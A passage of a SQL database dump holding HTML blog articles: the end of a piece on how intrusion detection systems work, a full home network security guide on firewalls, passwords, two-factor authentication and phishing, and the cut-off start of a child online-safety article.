Using several complementary threat identification techniques, the IDS detects suspicious activity; the primary methods are described below.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Signature-Based Detection</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Signature-based IDS compares traffic against a database of pre-determined rules or signatures. A signature describes a known attack: a characteristic byte sequence in a payload, specific header values or protocol fields, or known-malicious indicators such as <b><strong class=\"font-bold\">IP addresses</strong></b>, domains or file hashes—not merely a <b><strong class=\"font-bold\">port number.</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: This technique is highly effective at identifying well-documented attacks quickly and accurately, with a low false-positive rate and an alert that names the specific attack matched.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Challenge</strong></b>: It may miss new, emerging threats (e.g., zero-day attacks) that don’t fit an existing signature profile, and even known attacks can slip past if the attacker alters the traffic enough (encoding, fragmentation, obfuscation) to break the match, so the signature database must be updated continuously.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Anomaly Detection</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Anomaly detection methods look for unusual or abnormal patterns of network traffic that deviate from the norm.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: These systems adapt to identify newer, previously unknown threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Challenge</strong></b>: They are prone to generating false positives, requiring careful calibration.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Heuristics and Behavioral Analysis</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Heuristics-based systems use algorithms to evaluate behavior across the network, identifying actions that match known malicious behaviors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: This method excels at spotting complex, sophisticated attacks by analyzing overall activity rather than predefined rules.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By using a mix of these techniques, IDS can uncover not only obvious threats but also stealthier, less predictable attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Happens When Suspicious Activity Is Detected?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When the IDS detects an intrusion or irregular pattern, it immediately triggers an alert. Administrators are notified via dashboards, emails, or other notification systems. 
Beyond standard alerts, automated reporting can provide detailed insight into the activity detected, such as its source, affected devices, and severity; in most organizations these alerts are forwarded to a central log or SIEM platform so they can be correlated with other evidence and triaged.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From here, the network administrator is equipped to take appropriate counteractions, including blocking malicious IP addresses, isolating compromised systems from the network (rather than powering them off, which destroys volatile evidence an investigation may need), or flagging suspicious access attempts for further investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Limitations of Intrusion Detection Systems</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No tool is flawless, and it’s important to acknowledge the limitations of IDS to manage realistic expectations.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">False Positives and Negatives</strong></b>: Fine-tuning is essential, as IDS systems can sometimes flag benign activity as threats (false positives) or fail to identify genuine threats (false negatives). A high false-positive rate is not just noise: analysts start ignoring alerts, and the genuine one gets lost among them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Detection vs. Prevention</strong></b>: IDS is designed for <b><strong class=\"font-bold\">detection</strong></b>, not prevention—it won’t directly stop an attack. 
An inline <b><strong class=\"font-bold\">Intrusion Prevention System (IPS)</strong></b> can block matching traffic, but because a false positive then blocks legitimate traffic it must be tuned carefully; neither tool on its own makes an environment fully secure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Encrypted Traffic</strong></b>: A network IDS cannot inspect the contents of TLS-encrypted sessions unless traffic is decrypted in front of it, so on encrypted links it is limited to metadata such as endpoints, volumes, timing and certificates.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Still, despite their limitations, Intrusion Detection Systems act as a necessary safeguard in modern cybersecurity frameworks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Your Business Needs an IDS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Investing in an IDS provides several significant benefits for your business\'s network security.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Early Threat Detection</strong></b>: Spotting an intrusion attempt early shortens the time between compromise and response, limiting the damage an attacker can do before containment.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Compliance</strong></b>: Many regulatory and industry frameworks call for intrusion detection or continuous security monitoring as part of their data protection requirements.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Layered Security</strong></b>: IDS is an integral component of a holistic cybersecurity approach that includes firewalls, endpoint protection, and an IPS, with no single layer relied upon to catch everything.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adding IDS to your defenses, you position your business for success 
against the backdrop of increasing cyber threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right IDS for Your Needs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Selecting the ideal IDS involves considering your organization’s specific requirements, such as the size of your network, compliance requirements, and your internal resource capabilities. Solutions like network-based IDS (NIDS) are perfect for monitoring entire infrastructures, while host-based IDS (HIDS) are tailored for finer, localized control.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b> isn’t just a \"nice-to-have\" anymore—it’s a must-have for any business aiming to safeguard its critical systems. With its focus on detection rather than prevention, it serves as an early warning system, allowing organizations to act swiftly to counter threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">However, an IDS works best as part of a <b><strong class=\"font-bold\">layered security strategy</strong></b>, including tools like <b><strong class=\"font-bold\">Intrusion Prevention Systems (IPS)</strong></b> to block attacks, alongside firewalls and endpoint protection. It’s about building comprehensive, actionable defenses in an age where cyber threats are more prevalent than ever.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Is your network secure? 
Start exploring IDS solutions today to bring peace of mind to your business</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:19:11', '2026-01-12 21:41:44', 'Information Security', 'The Fundamentals of Intrusion Detection Systems (IDS): How They Work and Why They\'re Essential', '', NULL),
(136, 'Protect your networks devices from cyber threats', 'protect-your-networks-devices-from-cyber-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensuring the security of your home devices and networks has become a top priority in today\'s hyper-connected world. With cyber threats evolving constantly, the need for robust, multi-layered cybersecurity strategies cannot be overstated. This guide dives deep into eight effective ways to secure your digital fortress, offering practical insights to protect your personal information and devices.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Set Up a Firewall</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A firewall acts as the first line of defense for your home network, monitoring and controlling both incoming and outgoing traffic. Think of it as a vigilant security guard standing at the gate of your digital world, protecting you from potential threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of a Firewall:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Blocks unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Shields devices from external threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Establishes a secure barrier between your trusted 
internal network and unknown, external networks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Make sure your firewall is enabled on your router and that any connected devices also have their firewalls activated. Also disable remote (internet-side) administration of the router unless you genuinely need it, and change its default administrator password.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Install Antivirus and Anti-Malware Software</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Antivirus and anti-malware software are like your digital immune system, working around the clock to detect and neutralize threats like viruses, ransomware, and spyware.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Keep both the software and its detection definitions up to date so it can recognize the latest threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Schedule regular full scans to catch malware that slipped past real-time protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Choose software from reputable providers and download it only from the vendor’s own site—fake \"antivirus\" downloads and pop-ups are themselves a common way malware is delivered.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Use a Virtual Private Network (VPN)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A virtual private network (VPN) encrypts the traffic between your device and the VPN provider’s server, so anyone on the local network—for example, other users of a public Wi-Fi hotspot—cannot read or tamper with it. Be clear about what it does not do: a VPN offers no protection against malware, phishing, or a malicious website, and the VPN provider itself can see the traffic you route through it, so choose one you trust.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advantages of a VPN:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Encrypts your traffic on the path to the VPN server, hiding it from the local network and your ISP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Masks your IP address and approximate location from the sites you visit, for added privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Protects sensitive data when using public Wi-Fi networks, such as at cafes or airports, where the network operator or other guests may be hostile.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Keep Software and Systems Updated</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using outdated software and devices is akin to leaving your front door wide open for cybercriminals. 
Many attacks exploit vulnerabilities in older systems, so regular updates are crucial.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Update Checklist:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Operating systems on computers, smartphones, and tablets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Software applications and programs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Firmware for routers and other networked devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Security software for all devices.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Enable automatic updates wherever possible to stay protected without lifting a finger.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Use Strong, Unique Passwords</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your passwords are the keys to your digital kingdom. 
The stronger they are, the harder it is for hackers to gain access to your accounts and devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Password Best Practices:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Favor length over complexity: a long passphrase of several unrelated words is harder to crack than a short string of mixed symbols, and current guidance (NIST SP 800-63B) no longer recommends forced character-class rules or routine expiry.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid using easily guessable information, like your name or birthdate, or any password you have already used elsewhere.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use a different password for each account, so that a password leaked from one breached site cannot be replayed against your others (credential stuffing).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Use a password manager to generate and store unique, random passwords—it is the only practical way to follow the previous rule.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Enable Two-Factor Authentication (2FA)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an extra layer of security to your accounts. 
It’s like a door that needs two different keys: a stolen password alone is no longer enough to get in.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How It Works:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Enter your password to access your account.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Provide a second form of verification, such as a fingerprint, a one-time code from an authenticator app, a hardware security key, or a code sent to your phone. Not all second factors are equal: SMS codes can be intercepted through SIM-swap attacks and any one-time code can be phished, while hardware keys and passkeys (FIDO2) are bound to the real site and resist phishing—prefer them where offered.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Wherever possible, enable 2FA on all accounts, including email, social media, and financial services. Start with your email account: whoever controls it can reset the passwords of almost everything else.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Exercise Caution with Emails and Links</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails and suspicious links remain some of the most common entry points for cybercriminals. 
A little caution can go a long way in keeping your devices safe.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Safety Tips:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid clicking on links from unknown senders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Be wary of unexpected attachments, even from people you know.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Verify sender email addresses for authenticity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">When in doubt, contact the sender through a trusted method to confirm the email’s legitimacy.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. Educate Yourself About Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge is power when it comes to staying ahead of cyber threats. 
Understanding the latest cybersecurity trends and best practices can help you safeguard your digital life.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Stay Updated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow cybersecurity blogs and subscribe to newsletters.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Attend webinars and online courses to deepen your knowledge.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Join forums and online communities to exchange tips and resources with like-minded individuals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why a Multi-Layered Approach Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is not a singular solution—it\'s a combination of defenses that work together to protect your home network and devices. A firewall keeps unauthorized access at bay, antivirus software catches malicious threats, and strong passwords and 2FA secure individual accounts. 
When these methods are combined, they create a digital environment that’s much harder for cybercriminals to penetrate.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protecting your home devices doesn’t have to be overwhelming. By implementing these eight strategies, you’ll significantly reduce your chances of falling victim to cybercrime. Take proactive steps today to secure your digital world—it’s a small investment of time for long-term peace of mind.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For more tips, tutorials, and the latest trends in cybersecurity, subscribe to our newsletter and stay ahead of the game. Secure smarter, not harder!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:17:33', '2026-01-12 21:41:44', 'Information Security', 'Protect your networks devices from cyber threats', '', NULL),
(137, 'Keep safe your kids from danger of internet', 'keep-safe-your-kids-from-danger-of-internet', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet is a double-edged sword. On one hand, it provides kids with access to a wealth of knowledge, opportunities for education, and platforms to connect with peers. On the other hand, it exposes them to risks that can jeopardize their safety and well-being. For parents, finding an effective way to protect children while allowing them to benefit from the digital world is a must.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From inappropriate content to cyberbullying and online exploitation, the internet has its share of dangers. But the good news is, there are effective steps you can take to shield your kids from harm and equip them with the tools to safely explore the online world. Let\'s break it down.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Keeping Kids Safe Online Is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children today are born into a digital-first world, often spending hours online every day. While technology is an incredible tool for learning and entertainment, it also includes hidden threats. Here\'s why safeguarding their digital presence is critical:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] 